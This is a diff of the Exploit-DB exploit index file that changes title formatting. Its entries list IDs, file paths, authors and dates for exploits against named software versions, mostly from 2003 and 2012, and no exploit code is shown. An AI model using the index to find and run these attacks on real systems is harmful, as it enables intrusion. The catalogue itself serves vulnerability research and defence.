22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI - ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",windows,dos,0 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos,0 @@ -20062,12 +20058,12 @@ id,file,description,date,author,platform,type,port 22819,platforms/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",php,webapps,0 22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 - member.php member Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 - buddy.php action Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 -22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 -22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 +22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 +22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0 -22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 +22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps,0 22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos,0 @@ -20084,7 +20080,7 @@ id,file,description,date,author,platform,type,port 22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 - HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0 22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,windows,dos,0 -22845,platforms/php/webapps/22845.txt,"PABox 1.6 Password Reset",2003-06-30,silentscripter,php,webapps,0 +22845,platforms/php/webapps/22845.txt,"PABox 1.6 - Password Reset",2003-06-30,silentscripter,php,webapps,0 22846,platforms/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 - WWWLaunchNetscape Buffer Overflow",2003-07-01,"Paul Szabo",linux,dos,0 22847,platforms/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions",2003-07-01,"Larry W. Cashdollar",linux,local,0 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0 @@ -20098,9 +20094,9 @@ id,file,description,date,author,platform,type,port 22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration Passthru",2012-11-21,Metasploit,linux,remote,0 22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 22858,platforms/openbsd/remote/22858.txt,"OpenBSD 3.x - PF RDR Network Information Leakage",2003-07-02,Ed3f,openbsd,remote,0 -22859,platforms/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos,0 +22859,platforms/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 - Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos,0 22860,platforms/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,linux,local,0 -22861,platforms/linux/local/22861.c,"GNU AN Local Command Line Option Buffer Overflow",2003-07-03,ace,linux,local,0 +22861,platforms/linux/local/22861.c,"GNU AN - Local Command Line Option Buffer Overflow",2003-07-03,ace,linux,local,0 22862,platforms/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local,0 22863,platforms/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0 22864,platforms/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - Custva.ASP SQL Injection",2003-07-04,Bosen,asp,webapps,0 @@ -20112,7 +20108,7 @@ id,file,description,date,author,platform,type,port 22870,platforms/windows/local/22870.txt,"Microsoft Windows XP/2000 - RunDLL32.EXE Buffer Overflow",2003-07-06,"Rick Patel",windows,local,0 22871,platforms/windows/remote/22871.c,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (1)",2003-07-07,vkhoshain,windows,remote,0 22872,platforms/windows/remote/22872.txt,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (2)",2003-07-07,"Peter Winter-Smith",windows,remote,0 -22873,platforms/linux/remote/22873.c,"GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow",2003-07-06,isox,linux,remote,0 +22873,platforms/linux/remote/22873.c,"GKrellM Mailwatch Plugin 2.4.1/2.4.2 - From Header Remote Buffer Overflow",2003-07-06,isox,linux,remote,0 22874,platforms/php/webapps/22874.txt,"CPanel 5.0/5.3/6.x - Admin Interface HTML Injection",2003-07-07,"Ory Segal",php,webapps,0 22875,platforms/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos,0 22876,platforms/hardware/dos/22876.txt,"Canon GP300 - Remote Malformed HTTP Get Denial of Service",2003-07-07,"DOUHINE Davy",hardware,dos,0 @@ -20127,13 +20123,13 @@ id,file,description,date,author,platform,type,port 22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0 22883,platforms/windows/local/22883.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0 22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 -22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 +22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - Download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 -22890,platforms/freebsd/remote/22890.pl,"cftp 0.12 Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 -22891,platforms/freebsd/remote/22891.pl,"IglooFTP 0.6.1 Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 +22890,platforms/freebsd/remote/22890.pl,"cftp 0.12 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 +22891,platforms/freebsd/remote/22891.pl,"IglooFTP 0.6.1 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 22892,platforms/windows/remote/22892.txt,"Mabry Software HTTPServer/X 1.0 0.047 - File Disclosure",2003-07-11,dr_insane,windows,remote,0 22893,platforms/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote,0 22894,platforms/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,linux,remote,0 @@ -20141,30 +20137,30 @@ id,file,description,date,author,platform,type,port 22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0 22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Request Buffer Overflow",2003-07-07,posidron,linux,dos,0 22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,hardware,remote,0 -22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server Denial of Service (1)",2003-06-10,st0ic,windows,dos,0 -22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server Denial of Service (2)",2003-07-14,st0ic,windows,dos,0 -22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 Information Disclosure",2003-07-14,JackDaniels,php,webapps,0 +22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server - Denial of Service (1)",2003-06-10,st0ic,windows,dos,0 +22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server - Denial of Service (2)",2003-07-14,st0ic,windows,dos,0 +22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 - Information Disclosure",2003-07-14,JackDaniels,php,webapps,0 22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service PoC",2012-11-22,t4c,linux,dos,0 22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - ldapagnt_eval() Remote Perl Code Execution",2012-11-22,Metasploit,windows,remote,0 -22904,platforms/linux/dos/22904.py,"TrouSerS Denial of Service",2012-11-23,"Andy Lutomirski",linux,dos,0 +22904,platforms/linux/dos/22904.py,"TrouSerS - Denial of Service",2012-11-23,"Andy Lutomirski",linux,dos,0 22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,Metasploit,windows,remote,0 22906,platforms/php/webapps/22906.txt,"jBilling 3.0.2 - Cross-Site Scripting",2012-11-25,"Woody Hughes",php,webapps,0 22907,platforms/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",php,webapps,0 -22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0 +22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 - Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0 22909,platforms/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,windows,remote,0 -22910,platforms/php/webapps/22910.html,"Splatt Forum 3/4 Post Icon HTML Injection",2003-07-15,Lethalman,php,webapps,0 +22910,platforms/php/webapps/22910.html,"Splatt Forum 3/4 - Post Icon HTML Injection",2003-07-15,Lethalman,php,webapps,0 22911,platforms/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0 22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Inclusion Information Disclosure",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote,0 22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos,0 -22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 Plain Text Password",2003-07-22,hanez,windows,local,0 +22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 -22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 +22951,platforms/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0 22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution",2003-07-24,"Martin Eiszner",php,webapps,0 @@ -20173,7 +20169,7 @@ id,file,description,date,author,platform,type,port 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 - Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 -22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 +22963,platforms/cgi/webapps/22963.txt,"Softshoe - Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String",2003-07-28,lucipher,unix,remote,0 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - HOME Environment Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (1)",2003-07-29,D4rkGr3y,windows,remote,0 @@ -20186,33 +20182,33 @@ id,file,description,date,author,platform,type,port 22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting",2003-07-16,"Brett Moore",windows,remote,0 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,unix,dos,0 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0 -22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0 +22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Root Exploit (1)",2003-07-16,DVDMAN,unix,local,0 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Root Exploit (2)",2003-07-16,nic,unix,local,0 22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Path Disclosure",2003-07-17,Bosen,php,webapps,0 22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",multiple,dos,0 22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 -22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 -22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional (Direct Retn)",2012-11-26,Nezim,windows,local,0 +22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 +22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - (Direct Retn) Exploit",2012-11-26,Nezim,windows,local,0 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 23007,platforms/windows/local/23007.rb,"Windows - AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 -23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 +23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 - Path Disclosure",2003-08-11,G00db0y,php,webapps,0 -23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure",2003-08-11,G00db0y,php,webapps,0 +23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 - Store Builder Remote Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting",2003-08-11,G00db0y,php,webapps,0 23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 - Path Disclosure",2003-08-11,G00db0y,php,webapps,0 -23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module - day Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 22936,platforms/php/webapps/22936.txt,"SmartCMS - (index.php idx parameter) SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 -22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 -22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 +22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 +22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 - stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos,0 @@ -20224,18 +20220,18 @@ id,file,description,date,author,platform,type,port 22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-By-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 - realpath() Off-By-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 -22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 +22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 -22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 +22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0 22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos,0 22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local,0 22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local,0 -22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 PHP User Authentication Suite Cross-Site-Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 Long Message Denial of Service",2003-08-05,"Noam Rathaus",multiple,dos,0 -22988,platforms/unix/local/22988.sh,"IBM DB2 db2job File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 -22989,platforms/unix/local/22989.pl,"IBM DB2 Shared Library Injection",2003-08-05,daniels@legend.co.uk,unix,local,0 +22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site-Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 - Long Message Denial of Service",2003-08-05,"Noam Rathaus",multiple,dos,0 +22988,platforms/unix/local/22988.sh,"IBM DB2 db2job - File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 +22989,platforms/unix/local/22989.pl,"IBM DB2 - Shared Library Injection",2003-08-05,daniels@legend.co.uk,unix,local,0 22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 - Register.php HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 22991,platforms/hardware/dos/22991.txt,"D-Link DI-704P - Long URL Denial of Service",2003-08-06,chris@cr-secure.net,hardware,dos,0 22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 - Error.ASP Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 @@ -20243,12 +20239,12 @@ id,file,description,date,author,platform,type,port 22994,platforms/multiple/remote/22994.txt,"Sun One 5.1 / IPlanet 5.0/5.1 - Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",multiple,remote,0 22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 - Path Disclosure",2003-08-08,G00db0y,php,webapps,0 22996,platforms/linux/local/22996.c,"XPCD 2.0.8 - Home Environment Variable Local Buffer Overflow",2003-07-18,r-code,linux,local,0 -22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22999,platforms/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 - USER Memory Corruption",2003-08-08,zerash,windows,dos,0 23000,platforms/php/webapps/23000.txt,"geeeekShop 1.4 - Information Disclosure",2003-08-09,G00db0y,php,webapps,0 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - Admin.php Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 -23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote,0 +23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 - Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20258,28 +20254,28 @@ id,file,description,date,author,platform,type,port 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0 23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0 23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0 -23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0 +23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.CGI Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id param) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS - (index.php menuitem param) SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 -23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 -23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET topic title XSS",2003-08-13,G00db0y,asp,webapps,0 +23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name XSS",2003-08-13,G00db0y,asp,webapps,0 +23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title XSS",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"silverstripe CMS 